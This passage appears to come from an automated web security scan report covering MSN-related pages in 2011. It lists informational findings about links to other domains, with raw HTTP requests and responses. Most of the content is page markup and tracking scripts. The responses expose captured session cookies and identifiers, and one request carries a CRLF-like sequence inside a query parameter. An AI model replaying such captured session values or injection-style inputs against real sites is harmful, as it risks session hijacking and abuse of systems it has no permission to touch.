<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://wbenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://athima-chansanchai.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&amp;mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.348. http://theinvestedlife.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://theinvestedlife.redacted
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?source=msnmoney HTTP/1.1
Host: theinvestedlife.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=793
Content-Length: 27793
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 02:04:21 GMT
Last-Modified: Sun, 30 Jan 2011 01:49:21 GMT
Server: Microsoft-IIS/7.5
Vary: *
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:51:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/">
...[SNIP]...
<div id="wrapperTracking"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d743529/2/743550/randm.js"></script>
...[SNIP]...
<noscript><iframe style="position:absolute" src="http://fls.doubleclick.net/activityi;src=1620481;type=tdame177;cat=conte520;ord=1;num=1?" width="1" height="0" frameborder="0"></iframe>
...[SNIP]...
<li><a href="http://www.bltwy.com" target="_blank">BLTWY</a>
...[SNIP]...
<li class="menuItem"><a href="http://msn.foxsports.com/" target="_blank">Sports</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb" target="_blank">MLB</a></li><li><a href="http://msn.foxsports.com/nascar " target="_blank">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" target="_blank">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" target="_blank">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" target="_blank">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" target="_blank">NFL</a></li><li><a href="http://msn.foxsports.com/nhl" target="_blank">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" target="_blank">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" target="_blank">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp" target="_blank">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home" target="_blank">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" target="_blank"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV " target="_blank"> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" target="_blank">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" target="_blank">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com" target="_blank">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" target="_blank">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" target="_blank">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" target="_blank">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV " target="_blank">Travel</a>
...[SNIP]...
</div><a href="http://www.bing.com/" id="bingLogo" target="_blank">Bing</a></div><div id="msnHeaderRight"><a href="http://mail.live.com/" id="hotmailLink" class="divRight" target="_blank">Hotmail</a><a href="http://download.live.com/?sku=messenger" id="messengerLink" target="_blank">Messenger</a>
...[SNIP]...
<div id="tdaLogo"><a href="http://ad.doubleclick.net/clk;228891279;51205649;t" target="_blank" ><img src="http://blstb.redacted/i/4D/B7C87BC03E7E59C973DC6F7A93D0F4.png" title="The Invested Life" alt="The Invested Life"/>
...[SNIP]...
</div><a href="http://twitter.com/theinvestedlife" title="Follow Us" target="_blank" >Follow Us</a>
...[SNIP]...
</div><a href="http://www.facebook.com/pages/The-Invested-Life/149304748418908"..title="Become a Fan" target="_blank" >Become a Fan</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank">MSN Privacy</a>
...[SNIP]...
<li><a href="http://help.live.com/help.aspx?project=tou" target="_blank">Terms of Use</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home" target="_blank">Advertise</a>
...[SNIP]...
<li><a href="http://www.microsoft.com/library/toolbar/3.0/trademarks/en-us.mspx" target="_blank">Trademark</a>
...[SNIP]...
<div class="msnBCContainer"><a href="http://www.msnbc.com/" id="MsnBCHref" title="Go to msnbc.com" alt="Go to msnbc.com" target="_blank" ><div class="msnBC">
...[SNIP]...
</div><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d743529/3/743551/randm.js"></script><script type="text/javascript" src="http://analytics.live.com/Analytics/wlAnalytics.js"></script>
...[SNIP]...
<noscript><img src="http://c.live.com/c.gif?DI=15666"/></noscript>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/b?c1=2&c2=&c3=&c4=&c7=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /></noscript>
...[SNIP]...

22.349. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt?searchFirstName=&searchLastName=&searchAge=\r\naction=peopleSearch_wp_resultcount&city=&mname=&wel_age=0&peopleSearchFrom=wp&wel_fname=&wel_lname=&state=&x=0&y=0\ HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 01:51:08 GMT
Location: http://search.mylife.com/wp-people/?s_cid=DIS70b79249d87148edb59e29f186dfc0b753aa0a7422bf4444a8f1fff785ffedf1&searchFirstName=&searchLastName=&searchAge=%5Cr%5Cnaction=peopleSearch_wp_resultcount&city=&mname=&wel_age=0&peopleSearchFrom=wp&wel_fname=&wel_lname=&state=&x=0&y=0%5C
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ac1=51f37.61f6d=0129111951; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0|c51F37:61F6D_0_0_0_20BC47_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 30 Jan 2011 01:51:08 GMT
Content-Length: 443
Set-Cookie: NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:56:08 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://search.mylife.com/wp-people/?s_cid=DIS70b79249d87148edb59e29f186dfc0b753aa0a7422bf4444a8f1fff785ffedf1&amp;searchFirstName=&amp;searchLastName=&amp;searchAge=%5Cr%5Cnaction=peopleSearch_wp_resultcount&amp;city=&amp;mname=&amp;wel_age=0&amp;peopleSearchFrom=wp&amp;wel_fname=&amp;wel_lname=&amp;state=&amp;x=0&amp;y=0%5C">here</a>
...[SNIP]...

22.350. http://tv.redacted/tv/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tv.redacted
Path:   /tv/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /tv/article.aspx?news=625552&gt1=28103 HTTP/1.1
Host: tv.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 54864
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=fc9fd5bcf01942bab7d2e4a6851604f1; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:58:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Source: Sh
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/tvvertical9613.css" rev="stylesheet" type="text/css"/>

<style>
...[SNIP]...
</style>

<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><SCRIPT language=JavaScript src="http://entimg.msn.com/i/jScript/addCSSandSCRIPTtoHEAD.js" type=text/javascript>
...[SNIP]...
</SCRIPT>
<link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css">
<link rel="stylesheet" type="text/css" href="http://entimg.msn.com/i/css/news_article_page_cntwmodule_08.css"/>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home" rel="">Careers &amp; Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps &amp; Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections &amp; Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=BC">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406730&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Ftv.redacted%2Ftv%2Farticle.aspx%3Fnews%3D625552%26gt1%3D28103&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2ftv.redacted%2ftv%2farticle.aspx%3fnews%3d625552%26gt1%3d28103%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.redacted"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="leftNav_content"><img class="leftNav_bg" src="http://entimg.s-msn.com/i/grandprix/leftNavBg.gif" style="border-width:0px;" /><div class="MoviesleftNav_linkDiv">
...[SNIP]...
<span class="leftNav_disabled"><img src='http://entimg.s-msn.com/i/grandprix/leftNavSeperator.gif' /></span>
...[SNIP]...
<a title="TV News" href="http://tv.redacted/rss/toptvnews"> <img src='http://entimg.s-msn.com/i/ms/RssIcon.gif' style='border-width:0px;' class='NewsRssIconClass'/></a>
...[SNIP]...
<div class="ArticleImageDivCss"> <img title="..AP Photo/Chris Pizzello, File" src="http://entimg.s-msn.com/i/150/News/May10/Charlie_Sheen_150.jpg" alt="Charlie Sheen" style="height:200px;width:150px;border-width:0px;" /><div class="ArticleCaptionCss">
...[SNIP]...
<P>LOS ANGELES (AP) -- The production of <a href=http://www.bing.com/search?q=Charlie+Sheen&amp;form=msnena class="art">Charlie Sheen</a>
...[SNIP]...
</STRONG> <a href=http://www.bing.com/search?q=charlie+sheen%27s+woes&amp;form=msnena class="art">Charlie Sheen's recent woes</a>
...[SNIP]...
<div class="newsToolBarCommentsIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/discuss.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarMailIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/mail.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarDiggIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/Digg.gif" style="border-width:0px;" /></div>
...[SNIP]...
</style><a href='http://www.facebook.com/share.php?u=http%3a%2f%2ftv.redacted%2ftv%2farticle.aspx%3fnews%3d625552%26affid%3dfb' onclick='return fbs_click()' target='_blank' class='fb_share_link'>Facebook</a>
...[SNIP]...
<div class="newsToolBarSpacesIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/spacesBlog.gif" style="border-width:0px;" /></div>
...[SNIP]...
<a title="RSS for &quot;More TV News&quot;" href="/rss/toptvnews"><img src="http://entimg.s-msn.com/i/ms/RssIcon.gif" style="border-width:0px;" /></a>
...[SNIP]...
<a title="RSS for &quot;Just In News&quot;" href="/rss/entnews"><img src="http://entimg.s-msn.com/i/ms/RssIcon.gif" style="border-width:0px;" /></a>
...[SNIP]...
<td class="adText"><a href="http://choice.live.com/default.aspx"><img src="http://blstc.redacted/br/chan/css/decoration/adchoicesv4.png"/>
...[SNIP]...
<td class="adText"><a href="http://choice.live.com/default.aspx"><img src="http://blstc.redacted/br/chan/css/decoration/adchoicesv4.png"/>
...[SNIP]...
<DIV class=GossipSummaryContentDiv><a href=http://www.bing.com/videos/browse/Sundance class="altlink"><STRONG>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...

22.351. http://tv.redacted/tv/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tv.redacted
Path:   /tv/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /tv/article.aspx?news=625552&gt1=28103 HTTP/1.1
Host: tv.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 54757
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=62ae4f15c8c0486a828bffcaa09140f2; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:51:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Source: Sh
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/tvvertical9613.css" rev="stylesheet" type="text/css"/>

<style>
...[SNIP]...
</style>

<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><SCRIPT language=JavaScript src="http://entimg.msn.com/i/jScript/addCSSandSCRIPTtoHEAD.js" type=text/javascript>
...[SNIP]...
</SCRIPT>
<link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css">
<link rel="stylesheet" type="text/css" href="http://entimg.msn.com/i/css/news_article_page_cntwmodule_08.css"/>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home" rel="">Careers &amp; Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps &amp; Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections &amp; Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=BC">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345100&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Ftv.redacted%2Ftv%2Farticle.aspx%3Fnews%3D625552%26gt1%3D28103&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2ftv.redacted%2ftv%2farticle.aspx%3fnews%3d625552%26gt1%3d28103%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.redacted"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
